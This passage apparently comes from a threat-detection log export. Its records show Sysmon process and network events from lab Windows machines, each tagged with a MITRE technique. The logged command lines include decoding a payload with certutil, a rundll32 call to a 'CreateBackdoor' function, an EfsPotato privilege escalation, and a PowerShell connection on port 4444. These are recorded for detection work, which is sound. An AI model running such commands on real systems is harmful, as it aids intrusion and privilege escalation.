(win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\Windows\System32\cmd.exe + 
C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + NT AUTHORITY\SYSTEM + 365ABB72-8693-5CD7-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8693-5CD7-0000-0010765E0000 + 492 + C:\Windows\System32\lsass.exe + C:\Windows\system32\lsass.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1140] Deobfuscate/Decode Files or Information,1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ) tried decoding file or information,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1564435979.582599,2019-07-30T01:32:59.582599+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\certutil.exe ) through command line ( certutil -f -decode fi.b64 AllTheThings.dll ),1," + 
+ + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4890 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.940 + 747F3D96-660A-5D3F-0000-0010FFF28500 + 700 + C:\Windows\System32\certutil.exe + 10.0.17763.1 (WinBuild.160101.0800) + CertUtil.exe + Microsoft® Windows® Operating System + Microsoft Corporation + certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + 
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834100.731416,2019-08-03T16:08:20.731416+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5447 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:19.888 + 747F3D96-7933-5D45-0000-0010227E0701 + 6000 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7930-5D45-0000-001055DE0601 + 4740 + C:\Windows\System32\consent.exe + consent.exe 896 318 0000028064471300 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + 
NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.982057,2020-03-21T09:00:17.982057+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243512 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.504 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + 
Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.359432,2019-05-14T06:32:48.359432+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17717 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.342 + 365ABB72-28D0-5CDA-0000-0010F76F1300 + 3964 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] 
System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami /priv) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15678 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:33:29.409 + 365ABB72-7DA9-5CD5-0000-00100ED31400 + 2524 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami /priv + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + "c:\Windows\System32\cmd.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1629660818.905645,2021-08-22T23:33:38.905645+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1912935 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-08-22 19:33:38.890 + 00247C92-A692-6122-0000-0010A5CD1F02 + 11328 + C:\Windows\System32\whoami.exe + 10.0.19041.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\WINDOWS\system32\ + NT AUTHORITY\SYSTEM + 00247C92-7087-6122-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=1915FBFDB73FDD200C47880247ACDDE5442431A9,MD5=A4A6924F3EAF97981323703D38FD99C4,SHA256=1D4902A04D99E8CCBFE7085E63155955FEE397449D386453F6C452AE407B8743,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 
00247C92-A691-6122-0000-001021C31F02 + 14048 + C:\temp\EfsPotato.exe + c:\temp\EfsPotato.exe whoami + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.711831,2019-07-30T01:32:58.711831+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c certutil -f -decode fi.b64 AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4888 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:58.614 + 747F3D96-660A-5D3F-0000-0010B9E08500 + 3184 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c certutil -f -decode fi.b64 AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557495209.424885,2019-05-10T17:33:29.424885+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15677 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-10 13:32:54.034 + 365ABB72-7D86-5CD5-0000-0010CC2E1400 + 2076 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "c:\Windows\System32\cmd.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 
365ABB72-79DF-5CD5-0000-0020F8410100 + 0x141f8 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-7D85-5CD5-0000-001047061400 + 2536 + C:\Windows\System32\CompMgmtLauncher.exe + "C:\Windows\System32\CompMgmtLauncher.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1561018078.816185,2019-06-20T12:07:58.816185+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8119 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:52.956 + 365ABB72-3ED8-5D0B-0000-0010398F1A00 + 1476 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-3ED4-5D0B-0000-0010B2871A00 + 1440 + C:\Windows\System32\cmd.exe + "cmd" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /groups) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays 
logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557801168.290682,2019-05-14T06:32:48.290682+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /groups ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17715 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 02:32:48.290 + 365ABB72-28D0-5CDA-0000-00103A6B1300 + 2676 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /groups + C:\temp\PowerShell-Suite-master\ + IEWIN7\IEUser + 365ABB72-26E1-5CDA-0000-002087350100 + 0x13587 + 1 + Medium + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-28A0-5CDA-0000-001074181300 + 2016 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435978.659405,2019-07-30T01:32:58.659405+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /C 
"C:\ProgramData\ssh\runtests.bat" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4887 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:32:57.600 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6056-5D3F-0000-0010C9EF4100 + 4600 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342417 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:08.141 + 747F3D96-E940-5F33-0000-001039310F00 + 7460 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-E909-5F33-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-E93C-5F33-0000-0010A6F00E00 + 8032 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational 
+Prohibited Process connecting to internet,1561018072.95681,2019-06-20T12:07:52.956810+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.13 ) to hostname ( ) , IP ( 10.0.2.18 ) and port ( 38208 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 8118 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.721 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.13 + IEWIN7 + 4444 + + false + 10.0.2.18 + + 38208 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1590282859.005259,2020-05-24T05:14:19.005259+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( whoami) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 196375 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-24 01:13:54.117 + 747F3D96-CA52-5EC9-0000-001027FA3700 + 4456 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + whoami + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564903596.239723,2019-08-04T11:26:36.239723+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) 
through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5637 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 07:26:35.116 + 747F3D96-88AB-5D46-0000-001081ED7D03 + 4300 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-88AA-5D46-0000-001093E37D03 + 4644 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe") ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,User Name : ( NT AUTHORITY\SYSTEM ) with Command Line : ( "C:\Windows\system32\whoami.exe" ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 110435 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-02 18:01:57.417 + 747F3D96-B595-5EAD-0000-00106BFDC200 + 6004 + C:\Windows\System32\whoami.exe + 10.0.17763.1 (WinBuild.160101.0800) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + whoami.exe + "C:\Windows\system32\whoami.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-6ABB-5EAD-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-B592-5EAD-0000-0010D4CDC200 + 1428 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342416 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 